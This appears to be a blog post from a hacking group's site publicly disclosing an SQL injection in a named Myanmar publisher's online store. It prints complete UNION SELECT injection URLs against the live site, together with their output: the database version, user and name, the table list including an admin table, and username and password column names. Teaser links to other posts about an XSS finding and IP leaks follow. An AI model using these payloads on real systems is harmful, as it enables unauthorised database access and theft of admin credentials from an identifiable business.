PlanetCreator.Net’s Security Team Member Info Freakzz <infofreakzzz(at)gmail.com> has reported another critical SQL Injection (vulnerability) on http://www.irrawaddystore.com owned by Irrawaddy Publishing Group.

These are some information from Vulneral Site http://www.irrawaddystore.com :

This vulnerability has been alerted to :- [email protected]

@@version,user(),database()

<a href="http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select%201,2,3,4,5,6,group_concat%28@@version,0x3a,user%28%29,0x3a,database%28%29%29,8,9,10,11,12,13,14,15,16,17,18--" target="_blank">http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select</a>


5.0.90-community:irrawadd_user@localhost:irrawadd_store
9

table_name

<a href="http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select%201,2,3,4,5,6,group_concat%28table_name%29,8,9,10,11,12,13,14,15,16,17,18%20from%20information_schema.tables%20where%20table_schema=database%28%29--" target="_blank">http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select</a>
<strong><a href="http://www.irrawaddystore.com/product.php?pro_id=1" target="_blank">store_admin,store_country,</a></strong>

column_name

<a href="http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select%201,2,3,4,5,6,group_concat%28column_name%29,8,9,10,11,12,13,14,15,16,17,18%20from%20information_schema.columns%20where%20table_schema=database%28%29--" target="_blank">http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select</a>
<strong><a href="http://www.irrawaddystore.com/product.php?pro_id=1" target="_blank">id,username,password</a></strong>

We hope that your security staff will look into this issue and fix it as soon as possible.

Thx – Infofreakzzz for sending security updates!

Explore More

Critical XSS Vulnerability in http://shwephonecard.com registered parent company is “MMM Network L.L.C.”

PlanetCreator.Net’s Security Team Member Info Freakzz <infofreakzzz(at)gmail.com> has reported another critical XSS vulnerability on http://www.shwephonecard.com  registered parent company is “MMM Network L.L.C.” These are some information from Vulneral Site http://www.shwephonecard.com:

Read More

Is your IP Leaking? Find out here

The first link shows your IP.http://www.whatismyip.com/This site will show more information like your town…http://www.geobytes.com/IpLocator.htm?GetLocationIf you pass this test your Proxys / Programs are doing their job…https://grc.com/x/ne.dll?bh0bkyd2 Privacy Check – checks

Read More

Hacker Motivation: I Think Therefore I Hack

Hackers’ motivations vary. For some, it’s economic. They earn a living through cyber crime. Some have a political or social agenda—their aim is to vandalize high-profile computers to make a

Read More